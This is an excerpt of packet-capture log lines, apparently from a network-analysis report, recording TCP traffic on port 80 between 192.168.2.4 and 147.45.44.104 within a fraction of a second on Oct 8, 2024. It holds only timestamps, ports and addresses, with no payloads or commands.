                                                  Oct 8, 2024 03:30:55.210376978 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.210376978 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.210403919 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.210514069 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.210530043 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.210545063 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.210560083 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.210560083 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.210576057 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.210587025 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.210592985 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.210609913 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.210618019 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.210627079 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.210647106 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.210653067 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.210664988 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.210684061 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.210688114 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.210724115 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.210756063 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.210772991 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.210788012 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.210803986 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.210817099 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.210820913 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.210855007 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.210894108 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.210908890 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.210922956 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.210941076 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.210942030 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.210958958 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.210963011 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.211003065 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.211046934 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211064100 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211078882 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211095095 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211107969 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.211111069 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211127996 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211143017 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.211143017 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211164951 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211169958 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.211182117 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211210966 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.211263895 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211281061 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211296082 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211309910 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.211312056 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211329937 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211337090 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.211345911 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211363077 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211371899 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.211415052 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.211416006 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211433887 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211450100 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211464882 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211474895 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.211482048 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211513042 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.211522102 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211539030 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211569071 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.259954929 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.297880888 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.298175097 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.298197985 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.298214912 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.298232079 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.298248053 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.298254013 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.298264980 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.298285961 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.298291922 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.298291922 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.298327923 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.298866034 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.298882961 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.298907995 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.298923969 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.298937082 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.298955917 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.298974037 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.298979044 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.298990011 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299025059 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299024105 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299041986 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299062014 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299072981 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299077988 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299096107 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299113035 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299148083 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299185038 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299200058 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299215078 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299232006 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299243927 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299247026 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299263954 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299273014 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299280882 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299297094 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299312115 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299326897 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299335003 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299354076 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299367905 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299381018 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299401999 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299411058 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299423933 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299427032 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299444914 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299460888 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299474955 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299489975 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299510002 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299516916 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299534082 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299549103 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299561024 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299565077 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299595118 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299609900 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299612045 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299627066 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299643040 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299654007 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299669027 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299674034 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299683094 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299700022 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299716949 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299720049 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299736023 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299741030 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299753904 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299772024 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299786091 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299802065 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299817085 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299815893 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299832106 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299860954 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299861908 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299877882 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299894094 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299906015 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299909115 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299937963 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299940109 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299957037 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299977064 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299988031 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.300021887 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.300259113 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300396919 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300410986 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300437927 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300450087 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.300457001 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300467014 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300483942 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300497055 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.300518990 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.300523996 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300540924 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300558090 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300574064 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300579071 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.300601959 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300604105 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.300617933 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300633907 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300651073 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300651073 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.300668001 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300685883 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.300708055 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.300710917 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300728083 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300743103 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300760031 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300767899 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.300803900 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.300981998 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301013947 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301029921 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301057100 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301073074 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301086903 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301103115 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301105022 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301105022 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301124096 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301140070 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301141977 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301158905 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301176071 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301184893 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301204920 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301207066 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301207066 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301225901 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301232100 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301249027 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301255941 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301270962 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301290035 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301290989 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301311970 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301326990 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301333904 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301333904 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301345110 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301352978 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301361084 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301368952 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301378965 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301436901 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301436901 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301532984 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301554918 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301572084 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301588058 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301593065 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301609039 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301641941 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301680088 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301697016 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301721096 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301731110 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301738024 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301753998 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301759005 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301770926 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301794052 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301796913 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301815033 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301830053 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301860094 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301862001 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301877975 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301889896 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301899910 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301914930 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301922083 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301937103 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301953077 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301956892 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301968098 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301985025 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301987886 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.302004099 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.302018881 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.353832960 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.390778065 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.390799999 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.390815973 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.390830994 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.390849113 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.390865088 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.390882969 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.390899897 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.390997887 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.390997887 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.390999079 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.391235113 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391268015 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391284943 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391300917 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391308069 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.391328096 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391335011 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.391347885 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391371965 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391386986 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.391402006 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391418934 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391436100 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391443014 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.391474009 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.391509056 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391525984 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391540051 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391546011 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391551971 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391567945 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391578913 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391597033 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.391632080 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.391654968 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391669989 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391701937 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.391702890 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391731977 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391748905 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391752005 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.391767979 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391783953 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391794920 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.391802073 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391819000 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391830921 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.391838074 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391855955 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.391860962 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391911983 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.391920090 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391962051 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391977072 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.392014980 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.392014980 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.392041922 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.392059088 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.392060995 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.392076969 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.392093897 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.392106056 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.392112017 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.392129898 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.392143965 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.392158031 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.392178059 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.392178059 CEST4973080192.168.2.4147.45.44.104
